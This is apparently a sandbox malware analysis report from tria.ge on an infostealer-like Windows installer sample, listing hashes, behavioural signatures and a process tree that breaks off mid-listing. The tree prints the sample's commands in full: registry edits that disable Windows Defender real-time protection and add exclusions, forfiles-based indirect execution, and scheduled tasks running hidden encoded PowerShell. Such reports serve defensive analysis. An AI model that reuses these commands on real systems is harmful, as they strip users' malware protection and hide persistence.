Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    245s
  • max time network
    246s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    26/08/2024, 05:01 UTC

General

  • Target

    35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe

  • Size

    7.3MB

  • MD5

    d899e1c3b4b597f35991ad001796efb6

  • SHA1

    74b306cc449fab5ca903c480a953c4390660cca4

  • SHA256

    35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549

  • SHA512

    99220fbfc50497a6c194a0adff91ab88d8617d71572e787896d11ba374d936acdc4fa2ab519d494cc5c6a0f1bd2d19158f3bed4a782827e88f51c562a9c1daa0

  • SSDEEP

    196608:91OlKUM0XQhhsNRl31gOfczhFgsm7BrrcfWMhbr0Ow6mrjKLlT:3OlQ0U+pfcFCsm7BrrcfXG6JLl

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell with the display window hidden.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe
    "C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Users\Admin\AppData\Local\Temp\7zSC67A.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2312
      • C:\Users\Admin\AppData\Local\Temp\7zSC8CB.tmp\Install.exe
        .\Install.exe /ldidp "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2116
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2072
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2288
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2184
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2460
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2720
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2716
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2752
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:2760
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                  PID:2816
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2820
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:2836
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2848
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                      PID:3068
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                  • Indirect Command Execution
                  PID:2764
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    6⤵
                      PID:2740
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2304
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          8⤵
                            PID:2608
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    4⤵
                    • Indirect Command Execution
                    PID:2700
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      5⤵
                        PID:3016
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3036
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            7⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3004
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bWNXgrRlacKgnUwPKK" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe\" Hi /gdpdidfiz 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Scheduled Task/Job: Scheduled Task
                      PID:2860
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 676
                      4⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:1720
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {3B30062D-F970-4E37-9734-8D823D3745AA} S-1-5-18:NT AUTHORITY\System:Service:
                1⤵
                  PID:2052
                  • C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe
                    C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe Hi /gdpdidfiz 525403 /S
                    2⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:2068
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1792
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:496
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          5⤵
                            PID:448
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:1136
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                          4⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:2092
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            5⤵
                              PID:1648
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:320
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:1696
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1944
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                6⤵
                                  PID:948
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                              4⤵
                              • Indirect Command Execution
                              • System Location Discovery: System Language Discovery
                              PID:1392
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                5⤵
                                  PID:944
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1088
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                4⤵
                                • Indirect Command Execution
                                PID:2572
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                  5⤵
                                    PID:1764
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1520
                                      • C:\Windows\SysWOW64\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2096
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "gCsdWAqEI" /SC once /ST 00:16:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:1784
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /run /I /tn "gCsdWAqEI"
                                3⤵
                                  PID:2140
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "gCsdWAqEI"
                                  3⤵
                                    PID:2904
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2756
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      4⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      • System Location Discovery: System Language Discovery
                                      PID:2820
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2760
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                      4⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      PID:2852
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "gcpmSykxt" /SC once /ST 02:28:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2980
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /run /I /tn "gcpmSykxt"
                                    3⤵
                                      PID:2204
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /DELETE /F /TN "gcpmSykxt"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1352
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                      3⤵
                                      • Indirect Command Execution
                                      • System Location Discovery: System Language Discovery
                                      PID:768
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1536
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1356
                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2728
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                        PID:2696
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2008
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1008
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:1000
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                          PID:1692
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1656
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2504
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2168
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C copy nul "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1592
                                          • C:\Windows\SysWOW64\wscript.exe
                                            wscript "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies data under HKEY_USERS
                                            PID:2560
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1092
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:320
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:612
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1088
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1460
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:484
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1596
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:908
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1788
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2256
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1264
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1752
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:716
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2404
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1296
                                            • C:\Windows\SysWOW64\reg.exe
